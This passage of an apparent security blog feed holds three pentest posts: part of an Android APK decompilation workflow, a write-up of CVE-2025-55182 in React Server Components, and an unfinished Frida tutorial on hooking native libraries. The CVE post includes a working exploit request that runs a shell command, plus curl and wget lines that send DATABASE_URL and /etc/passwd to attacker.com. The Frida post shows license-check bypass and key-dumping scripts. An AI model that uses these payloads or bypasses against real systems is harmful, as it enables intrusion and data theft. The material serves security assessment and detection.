id="extracting-native-libraries">Extracting Native Libraries</h2> <p>Some apps put sensitive logic in native code. The <code class="language-plaintext highlighter-rouge">.so</code> files are in <code class="language-plaintext highlighter-rouge">lib/</code>:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unzip <span class="nt">-j</span> target.apk <span class="s2">"lib/*"</span> <span class="nt">-d</span> native_libs/ </code></pre></div></div> <p>For basic analysis:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># List exported functions</span> nm <span class="nt">-D</span> native_libs/arm64-v8a/libnative.so <span class="c"># Search for strings</span> strings native_libs/arm64-v8a/libnative.so | <span class="nb">grep</span> <span class="nt">-i</span> key <span class="c"># Disassemble with objdump</span> objdump <span class="nt">-d</span> native_libs/arm64-v8a/libnative.so <span class="o">&gt;</span> disasm.txt </code></pre></div></div> <p>For serious native reversing, load them into Ghidra or IDA.</p> <h2 id="automation-script">Automation Script</h2> <p>Here’s a script that does the full workflow:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span> <span class="c"># apk_decompile.sh - Full APK decompilation workflow</span> <span class="nv">APK</span><span class="o">=</span><span class="nv">$1</span> <span class="nv">OUTPUT</span><span class="o">=</span><span class="k">${</span><span class="nv">2</span><span class="k">:-</span><span class="s2">"decompiled_</span><span class="si">$(</span><span class="nb">basename</span> <span class="nv">$APK</span> .apk<span class="si">)</span><span class="s2">"</span><span class="k">}</span> <span class="k">if</span> <span class="o">[</span> <span class="nt">-z</span> <span class="s2">"</span><span class="nv">$APK</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then </span><span class="nb">echo</span> <span class="s2">"Usage: </span><span class="nv">$0</span><span class="s2"> &lt;apk_file&gt; [output_dir]"</span> <span class="nb">exit </span>1 <span class="k">fi </span><span class="nb">mkdir</span> <span class="nt">-p</span> <span class="s2">"</span><span class="nv">$OUTPUT</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">"[*] Running apktool..."</span> apktool d <span class="s2">"</span><span class="nv">$APK</span><span class="s2">"</span> <span class="nt">-o</span> <span class="s2">"</span><span class="nv">$OUTPUT</span><span class="s2">/apktool"</span> <span class="nt">-f</span> <span class="nb">echo</span> <span class="s2">"[*] Extracting DEX files..."</span> unzip <span class="nt">-jo</span> <span class="s2">"</span><span class="nv">$APK</span><span class="s2">"</span> <span class="s2">"*.dex"</span> <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$OUTPUT</span><span class="s2">/dex"</span> <span class="nb">echo</span> <span class="s2">"[*] Converting DEX to JAR..."</span> <span class="k">for </span>dex <span class="k">in</span> <span class="s2">"</span><span class="nv">$OUTPUT</span><span class="s2">/dex/"</span><span class="k">*</span>.dex<span class="p">;</span> <span class="k">do </span><span class="nv">jar_name</span><span class="o">=</span><span class="si">$(</span><span class="nb">basename</span> <span class="s2">"</span><span class="nv">$dex</span><span class="s2">"</span> .dex<span class="si">)</span>.jar d2j-dex2jar <span class="s2">"</span><span class="nv">$dex</span><span class="s2">"</span> <span class="nt">-o</span> <span class="s2">"</span><span class="nv">$OUTPUT</span><span class="s2">/jar/</span><span class="nv">$jar_name</span><span class="s2">"</span> 2&gt;/dev/null <span class="k">done </span><span class="nb">echo</span> <span class="s2">"[*] Decompiling with CFR..."</span> <span class="k">for </span>jar <span class="k">in</span> <span class="s2">"</span><span class="nv">$OUTPUT</span><span class="s2">/jar/"</span><span class="k">*</span>.jar<span class="p">;</span> <span class="k">do </span>java <span class="nt">-jar</span> cfr-0.152.jar <span class="s2">"</span><span class="nv">$jar</span><span class="s2">"</span> <span class="nt">--outputdir</span> <span class="s2">"</span><span class="nv">$OUTPUT</span><span class="s2">/java"</span> <span class="nt">--silent</span> <span class="nb">true </span><span class="k">done </span><span class="nb">echo</span> <span class="s2">"[*] Running jadx for comparison..."</span> jadx <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$OUTPUT</span><span class="s2">/jadx"</span> <span class="s2">"</span><span class="nv">$APK</span><span class="s2">"</span> <span class="nt">--no-res</span> 2&gt;/dev/null <span class="nb">echo</span> <span class="s2">"[*] Done. Output in </span><span class="nv">$OUTPUT</span><span class="s2">/"</span> <span class="nb">echo</span> <span class="s2">" apktool/ - Decoded resources and smali"</span> <span class="nb">echo</span> <span class="s2">" java/ - CFR decompiled source"</span> <span class="nb">echo</span> <span class="s2">" jadx/ - jadx decompiled source"</span> </code></pre></div></div> <h2 id="what-to-look-for">What to Look For</h2> <p>Once you have the source, here’s what I hunt for during an assessment:</p> <p><strong>Authentication &amp; Authorization</strong></p> <ul> <li>How are tokens stored? (SharedPreferences, SQLite, files)</li> <li>Is certificate pinning implemented? How?</li> <li>Are there hardcoded credentials or API keys?</li> </ul> <p><strong>Data Storage</strong></p> <ul> <li>What’s stored locally? Is it encrypted?</li> <li>Are there SQLite databases with sensitive data?</li> <li>Check the <code class="language-plaintext highlighter-rouge">assets/</code> folder for config files</li> </ul> <p><strong>Network Communication</strong></p> <ul> <li>What endpoints does the app talk to?</li> <li>Is there a debug/staging server hardcoded?</li> <li>Are there websocket or MQTT connections?</li> </ul> <p><strong>Cryptography</strong></p> <ul> <li>Is crypto implemented correctly?</li> <li>Are there hardcoded keys or IVs?</li> <li>Is the app using weak algorithms (MD5, DES, ECB mode)?</li> </ul> <p><strong>Hidden Functionality</strong></p> <ul> <li>Debug modes or admin features</li> <li>Feature flags that enable extra functionality</li> <li>Test accounts or bypass codes</li> </ul> <h2 id="next-steps">Next Steps</h2> <p>Once you’ve found interesting code paths through static analysis, you can:</p> <ul> <li>Use <a href="/blog/frida-method-hooking-android/">Frida to hook methods</a> at runtime</li> <li><a href="/blog/android-ssl-pinning-bypass/">Bypass SSL pinning</a> to intercept traffic</li> <li>Patch the smali and rebuild the APK</li> <li>Hook native functions for deeper analysis</li> </ul> <p>The combination of static and dynamic analysis gives you the full picture of how an app works and where it’s vulnerable.</p> Sat, 13 Dec 2025 12:00:00 +0000 https://www.marginaldeer.com//blog/apk-reverse-engineering-workflow/ https://www.marginaldeer.com//blog/apk-reverse-engineering-workflow/ android reverse-engineering apktool dex2jar cfr jadx pentest mobile blog CVE-2025-55182: Pre-Auth RCE in React Server Components <p>On December 3rd, React disclosed CVE-2025-55182 - a pre-authentication remote code execution vulnerability in React Server Components with a CVSS score of 10.0.</p> <p>The vulnerability affects the <code class="language-plaintext highlighter-rouge">react-server-dom-webpack</code>, <code class="language-plaintext highlighter-rouge">react-server-dom-parcel</code>, and <code class="language-plaintext highlighter-rouge">react-server-dom-turbopack</code> packages in React versions 19.0.0 through 19.2.0. If you’re running Next.js, React Router with RSC, Waku, or other frameworks using these packages, you’ll want to check your systems.</p> <h2 id="the-vulnerability">The Vulnerability</h2> <p>React Server Components introduce a way for clients to call server-side functions through HTTP requests. When a user interacts with a Server Action (like submitting a form), React serializes the function reference and its arguments into a multipart form payload and sends it to the server. The server then deserializes this payload, resolves the function, and executes it.</p> <p>The core issue is in how React’s Flight protocol parses incoming payloads. The actual exploit technique used in the wild leverages prototype pollution through the deserialization process, not direct module loading as initially reported.</p> <h2 id="the-prototype-pollution-chain">The Prototype Pollution Chain</h2> <p>The real-world exploit uses a prototype pollution gadget chain that’s more reliable than module-based approaches. The attack works by:</p> <ol> <li><strong>Polluting Promise.prototype.then</strong> via <code class="language-plaintext highlighter-rouge">$1:__proto__:then</code> - This hijacks how React handles resolved server chunks</li> <li><strong>Injecting a resolved_model status</strong> - Makes React think this is a legitimate resolved server chunk</li> <li><strong>Reaching Function.constructor</strong> via <code class="language-plaintext highlighter-rouge">$1:constructor:constructor</code> - Accesses the Function constructor through the prototype chain</li> <li><strong>Executing arbitrary code</strong> via the <code class="language-plaintext highlighter-rouge">_prefix</code> field - Code placed here gets executed when the constructor is invoked</li> </ol> <p>The payload structure looks like this:</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"then"</span><span class="p">:</span><span class="w"> </span><span class="s2">"$1:__proto__:then"</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"resolved_model"</span><span class="p">,</span><span class="w"> </span><span class="nl">"reason"</span><span class="p">:</span><span class="w"> </span><span class="mi">-1</span><span class="p">,</span><span class="w"> </span><span class="nl">"value"</span><span class="p">:</span><span class="w"> </span><span class="s2">"{</span><span class="se">\"</span><span class="s2">then</span><span class="se">\"</span><span class="s2">:</span><span class="se">\"</span><span class="s2">$Baced</span><span class="se">\"</span><span class="s2">}"</span><span class="p">,</span><span class="w"> </span><span class="nl">"_response"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"_prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;arbitrary JavaScript code&gt;"</span><span class="p">,</span><span class="w"> </span><span class="nl">"_chunks"</span><span class="p">:</span><span class="w"> </span><span class="s2">"$Q2"</span><span class="p">,</span><span class="w"> </span><span class="nl">"_formData"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"get"</span><span class="p">:</span><span class="w"> </span><span class="s2">"$1:constructor:constructor"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>This is sent as a multipart form POST to any RSC endpoint. The <code class="language-plaintext highlighter-rouge">Next-Action</code> header triggers the Server Action handling code path.</p> <h2 id="attack-chain-in-action">Attack Chain in Action</h2> <p>Here’s what the full exploit looks like in practice.</p> <h3 id="step-1-reconnaissance">Step 1: Reconnaissance</h3> <p>First, identify RSC endpoints. In Next.js applications, these typically live at:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /_next/action POST /api/[action-name] POST /[any-route-with-server-actions] </code></pre></div></div> <p>Any route that handles Server Actions will process the Flight protocol payload.</p> <h3 id="step-2-craft-the-malicious-payload">Step 2: Craft the Malicious Payload</h3> <p>The exploit payload is sent as multipart form data. Here’s a raw HTTP request:</p> <div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">POST</span> <span class="nn">/</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">vulnerable-app.com</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW</span> <span class="na">Next-Action</span><span class="p">:</span> <span class="s">1234567890abcdef</span> <span class="na">Content-Length</span><span class="p">:</span> <span class="s">847</span> ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="1_$ACTION_REF_1" {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$Baced\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('id')","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}} ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="0" ["$K1"] ------WebKitFormBoundary7MA4YWxkTrZu0gW-- </code></pre></div></div> <p>The <code class="language-plaintext highlighter-rouge">Next-Action</code> header tells the server to process this as a Server Action. The payload structure exploits the Flight protocol parser.</p> <h3 id="step-3-trigger-execution">Step 3: Trigger Execution</h3> <p>When the server processes this request:</p> <ol> <li>React’s Flight decoder parses the multipart form</li> <li>The <code class="language-plaintext highlighter-rouge">__proto__:then</code> reference pollutes <code class="language-plaintext highlighter-rouge">Promise.prototype.then</code></li> <li>The <code class="language-plaintext highlighter-rouge">resolved_model</code> status tricks the chunk resolver</li> <li><code class="language-plaintext highlighter-rouge">constructor:constructor</code> reaches <code class="language-plaintext highlighter-rouge">Function</code></li> <li>The code in <code class="language-plaintext highlighter-rouge">_prefix</code> executes via the Function constructor</li> </ol> <h3 id="step-4-exfiltrate-output">Step 4: Exfiltrate Output</h3> <p>The clever part - output comes back in the error response:</p> <div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">500</span> <span class="ne">Internal Server Error</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">text/x-component</span> 0:{"error":"Internal Server Error","digest":"uid=1000(node) gid=1000(node) groups=1000(node)"} </code></pre></div></div> <p>The command output appears in the <code class="language-plaintext highlighter-rouge">digest</code> field. This works because React’s error handling serializes the thrown error, and the exploit chain throws an error containing the command output.</p> <h3 id="blind-exploitation">Blind Exploitation</h3> <p>For scenarios where errors aren’t returned, attackers use out-of-band techniques:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// DNS exfiltration</span> <span class="s2">`curl http://</span><span class="p">${</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">DATABASE_URL</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">@</span><span class="dl">'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]}</span><span class="s2">.attacker.com`</span> <span class="c1">// HTTP callback</span> <span class="s2">`wget -q -O- http://attacker.com/callback?data=$(cat /etc/passwd | base64)`</span> </code></pre></div></div> <h2 id="why-this-approach-works">Why This Approach Works</h2> <p>The prototype pollution chain is what actual attackers use because:</p> <ul> <li><strong>Bypasses WAFs</strong> - The payload looks like normal JSON data, not obvious code injection</li> <li><strong>Works with production error handling</strong> - Output can be extracted via the error digest field</li> <li><strong>Exploits the actual React Flight protocol parsing bug</strong> - Not a theoretical code path</li> <li><strong>Matches how real RSC payloads are structured</strong> - Harder to filter without breaking legitimate functionality</li> </ul> <p>Early reports focused on module-based probes like <code class="language-plaintext highlighter-rouge">vm#runInThisContext</code> and <code class="language-plaintext highlighter-rouge">fs#existsSync</code>. While these work in lab environments, the prototype pollution approach is what’s being used in active exploitation because it’s more reliable against production deployments.</p> <h2 id="real-world-prevalence">Real-World Prevalence</h2> <p>This vulnerability is widespread across production React applications.</p> <p>The key factors:</p> <ul> <li><strong>Any RSC endpoint is potentially vulnerable</strong> - Not just explicit Server Actions. The Flight protocol parsing happens before action validation.</li> <li><strong>Default Next.js 15+ configurations expose RSC endpoints</strong> - The App Router enables RSC by default.</li> <li><strong>The exploit bypasses common protections</strong> - WAFs and rate limiters often don’t catch it because the payload structure is valid JSON.</li> </ul> <p>If you’re running React 19.0.0-19.2.0 with any RSC-enabled framework in production, assume you’re vulnerable until patched.</p> <h2 id="detection">Detection</h2> <p>To detect exploitation attempts, look for:</p> <ul> <li>POST requests to RSC endpoints (<code class="language-plaintext highlighter-rouge">/_next/action</code>, <code class="language-plaintext highlighter-rouge">/api/*</code>, etc.) with <code class="language-plaintext highlighter-rouge">Next-Action</code> header</li> <li>Multipart form data containing <code class="language-plaintext highlighter-rouge">__proto__</code>, <code class="language-plaintext highlighter-rouge">constructor</code>, or <code class="language-plaintext highlighter-rouge">resolved_model</code></li> <li>Error responses containing unexpected <code class="language-plaintext highlighter-rouge">digest</code> values</li> </ul> <p>The vulnerability is exploited by sending a crafted multipart form payload. A safe detection method uses a canary string in the <code class="language-plaintext highlighter-rouge">_prefix</code> field - if the canary appears in the error digest response, the target is vulnerable.</p> <h2 id="affected-frameworks">Affected Frameworks</h2> <p>The following are affected when using vulnerable React versions:</p> <ul> <li>Next.js - All versions using React 19.0.0-19.2.0</li> <li>React Router - RSC APIs</li> <li>Waku</li> <li>Parcel RSC (<code class="language-plaintext highlighter-rouge">@parcel/rsc</code>)</li> <li>Vite RSC (<code class="language-plaintext highlighter-rouge">@vitejs/plugin-rsc</code>)</li> <li>Redwood SDK (<code class="language-plaintext highlighter-rouge">rwsdk</code>)</li> </ul> <h2 id="patching">Patching</h2> <p>Upgrade to patched versions immediately:</p> <ul> <li>React: 19.0.1, 19.1.2, or 19.2.1</li> <li>Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, or 16.0.7</li> </ul> <h2 id="references">References</h2> <ul> <li><a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components">React Security Advisory</a></li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-55182">NVD Entry</a></li> <li><a href="https://www.facebook.com/security/advisories/cve-2025-55182">Meta Security Advisory</a></li> </ul> Thu, 04 Dec 2025 12:00:00 +0000 https://www.marginaldeer.com//blog/cve-2025-55182-react-rsc-scanner/ https://www.marginaldeer.com//blog/cve-2025-55182-react-rsc-scanner/ web rce react blog Hooking Native Libraries with Frida Interceptor <p>This is part four of my Android pentest series. We’ve covered <a href="/blog/android-pentest-lab/">the lab setup</a>, <a href="/blog/android-ssl-pinning-bypass/">SSL pinning bypass</a>, and <a href="/blog/frida-method-hooking-android/">Java method hooking</a>. Now let’s go deeper and hook native code.</p> <p>A lot of apps implement security-sensitive logic in native libraries (.so files) to make reverse engineering harder. Crypto routines, license checks, anti-tampering — developers put this stuff in C/C++ thinking it’s safe. With Frida’s Interceptor API we can hook these functions just like we did with Java methods.</p> <h2 id="finding-native-libraries">Finding Native Libraries</h2> <p>First we need to know what native libraries the app loads. This script lists them:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Java</span><span class="p">.</span><span class="nf">perform</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">Runtime</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="dl">"</span><span class="s2">java.lang.Runtime</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">loadLibrary</span> <span class="o">=</span> <span class="nx">Runtime</span><span class="p">.</span><span class="nx">loadLibrary0</span><span class="p">.</span><span class="nf">overload</span><span class="p">(</span><span class="dl">'</span><span class="s1">java.lang.Class</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">java.lang.String</span><span class="dl">'</span><span class="p">);</span> <span class="nx">loadLibrary</span><span class="p">.</span><span class="nx">implementation</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">cls</span><span class="p">,</span> <span class="nx">lib</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Loading library: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">lib</span><span class="p">);</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">loadLibrary0</span><span class="p">(</span><span class="nx">cls</span><span class="p">,</span> <span class="nx">lib</span><span class="p">);</span> <span class="p">};</span> <span class="p">});</span> </code></pre></div></div> <p>Run this, use the app, and watch what gets loaded. You’ll see names like <code class="language-plaintext highlighter-rouge">libnative-lib.so</code>, <code class="language-plaintext highlighter-rouge">libcrypto.so</code>, or something app-specific.</p> <p>You can also list already-loaded modules:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Process</span><span class="p">.</span><span class="nf">enumerateModules</span><span class="p">({</span> <span class="na">onMatch</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">module</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">module</span><span class="p">.</span><span class="nx">path</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">"</span><span class="s2">/data/</span><span class="dl">"</span><span class="p">))</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">module</span><span class="p">.</span><span class="nx">name</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> @ </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">module</span><span class="p">.</span><span class="nx">base</span><span class="p">);</span> <span class="p">}</span> <span class="p">},</span> <span class="na">onComplete</span><span class="p">:</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{}</span> <span class="p">});</span> </code></pre></div></div> <h2 id="finding-functions-to-hook">Finding Functions to Hook</h2> <p>Once you know the library name, you need to find the functions inside it. If you have the APK, extract the .so file and throw it into Ghidra or IDA. Look for:</p> <ul> <li>Exported functions (easy to hook)</li> <li>Functions with interesting names like <code class="language-plaintext highlighter-rouge">verify</code>, <code class="language-plaintext highlighter-rouge">decrypt</code>, <code class="language-plaintext highlighter-rouge">check</code></li> <li>Cross-references from Java native method declarations</li> </ul> <p>You can also enumerate exports directly with Frida:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">module</span> <span class="o">=</span> <span class="nx">Process</span><span class="p">.</span><span class="nf">getModuleByName</span><span class="p">(</span><span class="dl">"</span><span class="s2">libnative-lib.so</span><span class="dl">"</span><span class="p">);</span> <span class="nx">module</span><span class="p">.</span><span class="nf">enumerateExports</span><span class="p">().</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">exp</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">exp</span><span class="p">.</span><span class="nx">type</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">exp</span><span class="p">.</span><span class="nx">name</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> @ </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">exp</span><span class="p">.</span><span class="nx">address</span><span class="p">);</span> <span class="p">});</span> </code></pre></div></div> <p>This gives you function names and addresses. Now we can hook them.</p> <h2 id="basic-native-hooking">Basic Native Hooking</h2> <p>The Interceptor API lets us hook any native function by address. Here’s the basic pattern:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">module</span> <span class="o">=</span> <span class="nx">Process</span><span class="p">.</span><span class="nf">getModuleByName</span><span class="p">(</span><span class="dl">"</span><span class="s2">libnative-lib.so</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">targetFunc</span> <span class="o">=</span> <span class="nx">module</span><span class="p">.</span><span class="nf">getExportByName</span><span class="p">(</span><span class="dl">"</span><span class="s2">Java_com_target_NativeLib_verify</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">targetFunc</span><span class="p">,</span> <span class="p">{</span> <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] verify() called</span><span class="dl">"</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> arg0: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">args</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> arg1: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">args</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="p">},</span> <span class="na">onLeave</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">retval</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> returns: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">retval</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> </code></pre></div></div> <p>For JNI functions the first two arguments are always <code class="language-plaintext highlighter-rouge">JNIEnv*</code> and either <code class="language-plaintext highlighter-rouge">jobject</code> (instance method) or <code class="language-plaintext highlighter-rouge">jclass</code> (static method). The actual parameters start at <code class="language-plaintext highlighter-rouge">args[2]</code>.</p> <h2 id="reading-string-arguments">Reading String Arguments</h2> <p>Native functions often take C strings or Java strings. Here’s how to read them:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">targetFunc</span><span class="p">,</span> <span class="p">{</span> <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// For C strings (char*)</span> <span class="kd">var</span> <span class="nx">cString</span> <span class="o">=</span> <span class="nx">args</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="nf">readCString</span><span class="p">();</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">C string: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">cString</span><span class="p">);</span> <span class="c1">// For Java strings (jstring) - need JNI env</span> <span class="kd">var</span> <span class="nx">env</span> <span class="o">=</span> <span class="nx">Java</span><span class="p">.</span><span class="nx">vm</span><span class="p">.</span><span class="nf">getEnv</span><span class="p">();</span> <span class="kd">var</span> <span class="nx">jString</span> <span class="o">=</span> <span class="nx">env</span><span class="p">.</span><span class="nf">getStringUtfChars</span><span class="p">(</span><span class="nx">args</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="kc">null</span><span class="p">).</span><span class="nf">readCString</span><span class="p">();</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Java string: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">jString</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> </code></pre></div></div> <p>I’ve used this to pull API keys and tokens right out of native crypto functions.</p> <h2 id="hooking-non-exported-functions">Hooking Non-Exported Functions</h2> <p>Sometimes the interesting functions aren’t exported. You’ll need to find them by offset from static analysis. If Ghidra tells you a function is at offset <code class="language-plaintext highlighter-rouge">0x1234</code> from the library base:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">module</span> <span class="o">=</span> <span class="nx">Process</span><span class="p">.</span><span class="nf">getModuleByName</span><span class="p">(</span><span class="dl">"</span><span class="s2">libnative-lib.so</span><span class="dl">"</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">funcAddr</span> <span class="o">=</span> <span class="nx">module</span><span class="p">.</span><span class="nx">base</span><span class="p">.</span><span class="nf">add</span><span class="p">(</span><span class="mh">0x1234</span><span class="p">);</span> <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">funcAddr</span><span class="p">,</span> <span class="p">{</span> <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Hidden function called!</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> </code></pre></div></div> <p>Just make sure you’re using the right offset for the architecture (ARM vs ARM64).</p> <h2 id="modifying-return-values">Modifying Return Values</h2> <p>Want to bypass a native check? Just change the return value:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">checkLicense</span> <span class="o">=</span> <span class="nx">module</span><span class="p">.</span><span class="nf">getExportByName</span><span class="p">(</span><span class="dl">"</span><span class="s2">checkLicense</span><span class="dl">"</span><span class="p">);</span> <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">checkLicense</span><span class="p">,</span> <span class="p">{</span> <span class="na">onLeave</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">retval</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Original return: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">retval</span><span class="p">);</span> <span class="nx">retval</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="c1">// Force success</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">[+] Modified to: 1</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> </code></pre></div></div> <p>I’ve bypassed root detection, integrity checks, and license validation this way. If it returns a boolean or int, you can usually just flip it.</p> <h2 id="dumping-encryption-keys">Dumping Encryption Keys</h2> <p>This is where native hooking really shines. A lot of apps do crypto in native code thinking it’s hidden. Hook the OpenSSL or custom crypto functions and grab everything:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Hook OpenSSL's AES_set_encrypt_key</span> <span class="kd">var</span> <span class="nx">aesSetKey</span> <span class="o">=</span> <span class="nx">Module</span><span class="p">.</span><span class="nf">findExportByName</span><span class="p">(</span><span class="dl">"</span><span class="s2">libcrypto.so</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">AES_set_encrypt_key</span><span class="dl">"</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">aesSetKey</span><span class="p">)</span> <span class="p">{</span> <span class="nx">Interceptor</span><span class="p">.</span><span class="nf">attach</span><span class="p">(</span><span class="nx">aesSetKey</span><span class="p">,</span> <span class="p">{</span> <span class="na">onEnter</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">keyLen</span> <span class="o">=</span> <span class="nx">args</span><span 